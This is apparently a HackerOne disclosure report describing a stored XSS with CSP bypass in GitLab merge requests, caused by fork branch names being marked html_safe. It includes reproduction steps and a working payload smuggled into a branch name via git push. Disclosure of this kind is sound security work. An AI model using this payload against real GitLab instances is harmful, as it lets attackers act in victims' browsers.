Stored-XSS with CSP-bypass in Merge requests
HackerOne report #1965750 by yvvdwf on 2023-04-28, assigned to @rshambhuni:
Report
Hi,
Gitlab recently added icon to indicate fork in the Merge requests page. This modification indicates source_branch as html_safe, which can cause XSS:
### https://gitlab.com/gitlab-org/gitlab/-/blob/f728534d7f6a357cf049cfd7a640a32504a1b9d6/app/helpers/merge_requests_helper.rb#L251
branch_title = if merge_request.for_fork?
_('%{source_project_path}:%{source_branch}').html_safe % { source_project_path: merge_request.source_project_path.html_safe, source_branch: merge_request.source_branch.html_safe }
else
merge_request.source_branch
end Reproduce
-
Within the current user, e.g.,
user_a, create a public projectuser_a/a -
Switch to another user, e.g.,
user_b:2.1. Fork
https://gitlab.com/user_a/ato a public projectuser_b/b
2.2. Cloneuser_b/bto your local machine usingssh:git clone git@gitlab.com:user_b/b
2.3. Push a new branch touser_b/b:
git clone git@gitlab.com:user_b/b
cd b
git push origin HEAD:"XSS<i/class=hidden><form/class=gl-show-field-errors><input/title='<script>alert(document.domain)</script>'>" 2.4. Back to the website gitlab.com, create a new merge request from the created branch above to user_a/a
2.5. After creating the merge request, you should see a popup that is created by <script>alert(document.domain)</script>
- The XSS should be existing at:
https://gitlab.com/user_a/a/-/merge_requests/1 - Example: https://gitlab.com/yvvdwf/test-xss-in-merge-request-via-fork/-/merge_requests/1 (in private mode)
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.
How To Reproduce
Please add reproducibility information to this section: